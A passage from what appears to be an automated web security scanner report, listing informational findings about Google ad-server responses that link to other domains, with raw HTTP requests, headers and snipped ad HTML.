<NOSCRIPT><a href="http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.57812&rtbip=63.251.90.145&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHBidqMC5ABhKsHoAEBqAGmswewAQI&redirecturl2=http://ad.doubleclick.net/jump/N2886.151350.QUANTCAST.COM/B5403001.15;abr=!ie4;abr=!ie5;sz=160x600;ord=57812?"><IMG SRC="http://ad.doubleclick.net/ad/N2886.151350.QUANTCAST.COM/B5403001.15;abr=!ie4;abr=!ie5;sz=160x600;ord=57812?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement">
...[SNIP]...
</IFRAME><img src="http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif?media=ad&p=TbQXjAAKqjgK5YMKmuIOL2lKuIg-FLTaLAY1MQ&r=1358250239&rand=57812&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=0,_imp.optver.26,_imp.optscore.104,_imp.optdr.0&rtbip=63.251.90.145&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHBidqMC5ABhKsHoAEBqAGmswewAQI" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

23.332. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676493&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658493907&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658493914&frm=1&adk=513358139&ga_vid=1738821208.1303658494&ga_sid=1303658494&ga_hid=1857389626&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:21:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1365

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="728" height="90" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0REyoPRMSz_696710848.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_-gAOCYEK5XdQI_RaDCZm9H-nfhLkah7veg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=420&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&"> </iframe>
...[SNIP]...

23.333. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680301&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662301770&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303662301772&frm=1&adk=2614322350&ga_vid=1987845434.1303662302&ga_sid=1303662302&ga_hid=1938999785&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=4 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:24:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2161

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=lkIA6MZjgdWNLb-ezcBaeR_R3Ys3RWmwKz7fP1nwguKkWeHPXDae0aU5zRDsg2DaUngWeeLXhaTZYK2uLANKOa9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ymbdXBugl_YriUkFVc2JIJzcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vGND4gyL4tJYU4x0ZDJlERs5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRO2gAMv4cK7GMUxys8ZZyWt7UCxBiTiBOAew&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBND4Z2k60TYf_MpTGsQfl-Ky5DMCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtwcQdRw2WoZD8G7XUPGVbZ5GL2fdg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.334. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676654&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658654961&bpp=7&shv=r20110420&jsv=r20110415&correlator=1303658654970&frm=1&adk=513358139&ga_vid=37961730.1303658655&ga_sid=1303658655&ga_hid=329915175&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=36813006%2C33895132&fu=4&ifi=1&dtd=13 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:24:12 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1364

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="728" height="90" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&"> </iframe>
...[SNIP]...

23.335. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303684196&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-attack-dynamically-evaluated-expression-style-attribute-javascript-controldcasecom.html&dt=1303666219191&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303666219284&frm=0&adk=1607234649&ga_vid=1109342583.1303666220&ga_sid=1303666220&ga_hid=1745655590&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=907&eid=36813005&fu=0&ifi=1&dtd=361&xpc=AKhsiR5Lrg&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 17:30:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12611

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-attack-dynamically-evaluated-expression-style-attribute-javascript-controldcasecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.NetApp.com%26adT%3DWeb%2BProxy%2BCache%26adU%3DNewRelic.com/PHP%26adT%3DMonitor%2Byour%2BPHP%2BServer%26adU%3Dwww.newdawntech.com%26adT%3DFree%2BGJXDM%2BWhite%2BPaper%26gl%3DUS&amp;usg=AFQjCNHxlBtqAiZQwbH1UVjYiEwVMYSZCg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.336. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681077&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663077493&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303663077506&frm=1&adk=2614322350&ga_vid=296993914.1303663078&ga_sid=1303663078&ga_hid=1160355399&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:37:54 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15013

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.sparco.com%26adT%3DComplete%2BIBM%2BSolutions%26adU%3Dwww.asaservers.com%26adT%3DASA%2B4U%2BServers%26gl%3DUS&amp;usg=AFQjCNFaVGk4g-b34UveQ0KGDKDDl1nj-g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.337. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381013&bpp=8&shv=r20110420&jsv=r20110415&correlator=1303658381040&frm=1&adk=2614322350&ga_vid=1758512325.1303658381&ga_sid=1303658381&ga_hid=1384201995&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=32 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:19:38 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1838

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=-yE2WDiJ9T_7ITZYOIn1PwAAAEAzMwdA-yE2WDiJ9T_7ITZYOIn1P5sh1rsNl6JOSsYda6b2ziWKP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAvA8BAgUCAAQAAAAAtyGL3QAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303658399%29%3Buf%28%27c%27%2C+52368%2C+1303658399%29%3Buf%28%27r%27%2C+173254%2C+1303658399%29%3Bppv%288991%2C+%275666257366427247003%27%2C+1303658399%2C+1303701599%2C+52368%2C+25553%29%3B&cnd=!rxFGFgiQmQMQxskKGAAg0ccBKEsx_5TyvDiJ9T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQ_igAAupwK5YMKNx5dnk5UwXzUk6H7LYr_pw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6NSjij-0TZz1AoqGlgeeu_m4A9fq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYArgDwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzghi4ziRoyAyYDhZkLYBiHzlX2Ow%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.338. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676635&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658635874&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658635885&frm=1&adk=2614322350&ga_vid=1031362686.1303658636&ga_sid=1303658636&ga_hid=1511491377&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1369

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODB8R0Z5UmlTRzhGNHwxMzAzNjU4NjM0OTIyfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgwNjEx&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAiAANpvUK5YDJIocngE1dSdpWpJDKZEirOQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODA&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=380&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.339. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679739&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661739260&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661739272&frm=1&adk=2614322350&ga_vid=1333282516.1303661739&ga_sid=1303661739&ga_hid=799776744&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
